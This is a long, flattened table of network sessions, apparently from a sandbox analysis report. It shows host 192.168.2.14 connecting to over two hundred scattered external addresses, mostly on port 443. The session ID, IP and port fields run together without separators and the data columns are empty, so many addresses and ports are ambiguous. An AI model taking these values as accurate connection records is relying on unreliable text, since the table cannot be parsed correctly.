                                                      11750192.168.2.1439674123.196.39.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11751192.168.2.144131259.199.2.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11752192.168.2.145529468.186.4.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11753192.168.2.1445438145.214.248.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11754192.168.2.1442554143.32.157.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11755192.168.2.1450768102.164.234.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11756192.168.2.1439752149.30.216.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11757192.168.2.143961672.47.189.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11758192.168.2.144269485.49.108.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11759192.168.2.1441348219.216.249.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11760192.168.2.1436280154.13.182.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11761192.168.2.1452786194.183.123.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11762192.168.2.144179838.181.108.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11763192.168.2.1433034156.238.61.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11764192.168.2.144660876.247.28.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11765192.168.2.1456360178.253.106.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11766192.168.2.1456788183.154.212.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11767192.168.2.144101277.50.143.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11768192.168.2.1435672208.127.208.164443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11769192.168.2.143380072.45.247.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11770192.168.2.1445366124.190.238.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11771192.168.2.145527874.147.246.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11772192.168.2.145857294.93.152.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11773192.168.2.14551161.15.177.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11774192.168.2.144985076.102.243.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11775192.168.2.143766234.237.253.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11776192.168.2.1452598101.102.213.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11777192.168.2.1459508106.128.215.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11778192.168.2.143520613.238.224.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11779192.168.2.1459100205.145.227.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11780192.168.2.1454146219.213.38.8443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11781192.168.2.1445464193.133.112.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11782192.168.2.1454174180.215.79.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11783192.168.2.1446528171.155.78.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11784192.168.2.143720286.205.170.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11785192.168.2.1456248175.131.40.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11786192.168.2.1455684116.115.164.141443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11787192.168.2.1440038101.21.189.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11788192.168.2.1436798113.69.237.237443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11789192.168.2.145070472.13.119.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11790192.168.2.1458704134.68.96.209443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11791192.168.2.1450202139.228.198.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11792192.168.2.1458062145.147.173.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11793192.168.2.144980647.88.169.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11794192.168.2.1450034174.207.241.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11795192.168.2.1443864156.189.150.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11796192.168.2.144317477.44.237.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11797192.168.2.145923289.53.172.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11798192.168.2.1456894102.37.23.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11799192.168.2.1437174195.20.79.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11800192.168.2.146055862.63.222.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11801192.168.2.144274227.181.157.107443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11802192.168.2.1449816121.81.23.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11803192.168.2.1435274192.234.6.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11804192.168.2.1449048193.166.113.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11805192.168.2.143789064.183.210.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11806192.168.2.1434800166.84.185.183443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11807192.168.2.1437360103.108.175.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11808192.168.2.1456234185.223.61.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11809192.168.2.145396853.179.94.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11810192.168.2.145158240.159.255.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11811192.168.2.1453008163.21.15.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11812192.168.2.1454464125.144.92.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11813192.168.2.1446726188.189.211.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11814192.168.2.144383063.151.92.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11815192.168.2.1454162125.251.83.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11816192.168.2.1459818121.253.164.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11817192.168.2.1457890220.66.102.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11818192.168.2.1455992133.16.19.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11819192.168.2.1437514201.23.158.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11820192.168.2.1458404135.63.156.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11821192.168.2.145411425.160.38.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11822192.168.2.143791485.154.139.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11823192.168.2.1449006201.79.184.23443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11824192.168.2.144551893.196.254.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11825192.168.2.144165839.10.90.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11826192.168.2.1451632102.223.124.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11827192.168.2.1459554157.131.204.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11828192.168.2.14467044.65.138.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11829192.168.2.145515270.8.35.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11830192.168.2.1441134154.99.236.83443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11831192.168.2.14372625.37.0.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11832192.168.2.1435614181.162.9.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11833192.168.2.1439832137.56.211.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11834192.168.2.145793865.101.214.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11835192.168.2.145444669.14.233.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11836192.168.2.1445700154.251.165.126443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11837192.168.2.1448162107.241.202.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11838192.168.2.1456452143.21.65.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11839192.168.2.1451928218.26.83.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11840192.168.2.145314850.120.67.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11841192.168.2.143680223.134.150.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11842192.168.2.1457268199.17.35.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11843192.168.2.1450414167.147.181.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11844192.168.2.144792461.85.167.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11845192.168.2.1438090191.238.44.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11846192.168.2.1459152147.237.103.129443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11847192.168.2.145796224.212.100.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11848192.168.2.1460212154.131.68.14443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11849192.168.2.1453904129.188.33.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11850192.168.2.1459768113.164.140.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11851192.168.2.1446920121.74.171.127443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11852192.168.2.145141284.71.125.249443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11853192.168.2.1441492219.176.237.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11854192.168.2.1450638198.120.95.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11855192.168.2.145673825.172.71.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11856192.168.2.1457668104.110.26.229443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11857192.168.2.1447116177.192.14.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11858192.168.2.14363801.224.85.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11859192.168.2.1455732177.183.75.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11860192.168.2.144699261.46.170.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11861192.168.2.1441258156.20.31.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11862192.168.2.1458874156.33.12.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11863192.168.2.1456362197.164.236.113443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11864192.168.2.143981283.130.197.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11865192.168.2.1440696185.29.57.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11866192.168.2.145251644.183.232.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11867192.168.2.1436908139.23.252.100443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11868192.168.2.144522634.211.163.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11869192.168.2.145281424.99.217.218443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11870192.168.2.1458504148.155.29.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11871192.168.2.1445832104.147.96.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11872192.168.2.1457912204.64.60.157443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11873192.168.2.1433734153.163.142.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11874192.168.2.14419065.44.253.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11875192.168.2.1460322197.24.109.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11876192.168.2.1457398199.7.118.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11877192.168.2.1455002132.97.184.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11878192.168.2.1433578132.169.186.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11879192.168.2.145791673.98.5.13443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11880192.168.2.1436470124.90.114.233443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11881192.168.2.1458398213.232.150.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11882192.168.2.1442394208.181.44.121443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11883192.168.2.1448784211.101.120.220443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11884192.168.2.144664084.143.209.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11885192.168.2.1456298147.113.215.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11886192.168.2.1447766184.200.104.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11887192.168.2.144536883.11.52.119443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11888192.168.2.1452356216.68.208.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11889192.168.2.1459176177.195.122.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11890192.168.2.144876249.81.224.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11891192.168.2.1448456107.127.98.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11892192.168.2.1451946199.154.10.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11893192.168.2.1443518152.207.241.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11894192.168.2.145491675.70.248.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11895192.168.2.1443314131.145.0.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11896192.168.2.1452694130.34.46.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11897192.168.2.1457528142.175.121.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11898192.168.2.1433420200.3.162.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11899192.168.2.1457842108.167.6.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11900192.168.2.145522049.138.91.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11901192.168.2.1433646134.100.50.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11902192.168.2.1445900142.242.99.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11903192.168.2.1449806136.31.20.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11904192.168.2.1439590182.142.182.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11905192.168.2.145576674.65.155.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11906192.168.2.1448514171.219.69.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11907192.168.2.143949463.239.226.58443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11908192.168.2.144053289.103.73.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11909192.168.2.14537388.118.62.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11910192.168.2.1445674150.174.159.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11911192.168.2.1439938165.3.93.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11912192.168.2.1439368103.127.103.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11913192.168.2.144653851.164.12.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11914192.168.2.1459918151.253.113.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11915192.168.2.1449686119.61.167.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11916192.168.2.144869885.82.124.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11917192.168.2.145366260.21.172.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11918192.168.2.1439278124.174.111.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11919192.168.2.1448076110.7.178.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11920192.168.2.1448872107.83.142.180443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11921192.168.2.145931043.139.67.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11922192.168.2.1440880195.106.98.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11923192.168.2.1448878131.13.36.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11924192.168.2.145974438.101.191.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11925192.168.2.145890425.205.90.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11926192.168.2.14505309.134.215.195443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11927192.168.2.1442164220.245.43.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11928192.168.2.1437600128.99.155.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11929192.168.2.144644431.9.94.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11930192.168.2.143663683.117.199.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11931192.168.2.143354248.129.134.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11932192.168.2.1443264113.109.157.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11933192.168.2.144560820.224.114.245443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11934192.168.2.1444164147.52.18.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11935192.168.2.1454540207.62.151.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11936192.168.2.143738260.173.160.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11937192.168.2.1454428161.221.229.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11938192.168.2.144255649.58.160.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11939192.168.2.1446818204.53.104.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11940192.168.2.145598473.18.231.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11941192.168.2.1439164168.144.9.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11942192.168.2.1439142223.112.99.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11943192.168.2.145203640.168.131.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11944192.168.2.14565985.137.90.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11945192.168.2.144249814.60.141.1358080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11946192.168.2.143475434.36.195.1428080
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11947192.168.2.14480729.37.88.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11948192.168.2.1449668163.149.16.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11949192.168.2.145527034.44.196.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11950192.168.2.1456244119.176.100.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11951192.168.2.145826885.253.155.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11952192.168.2.1437914172.121.246.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11953192.168.2.1460826109.124.186.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11954192.168.2.1456286189.206.124.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11955192.168.2.143981013.185.14.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11956192.168.2.1442110118.205.246.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11957192.168.2.14538928.54.75.75443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11958192.168.2.145674617.118.244.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11959192.168.2.1439580163.196.109.106443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11960192.168.2.144308483.212.20.120443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11961192.168.2.145940625.118.0.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      11962192.168.2.1452538179.152.88.159443
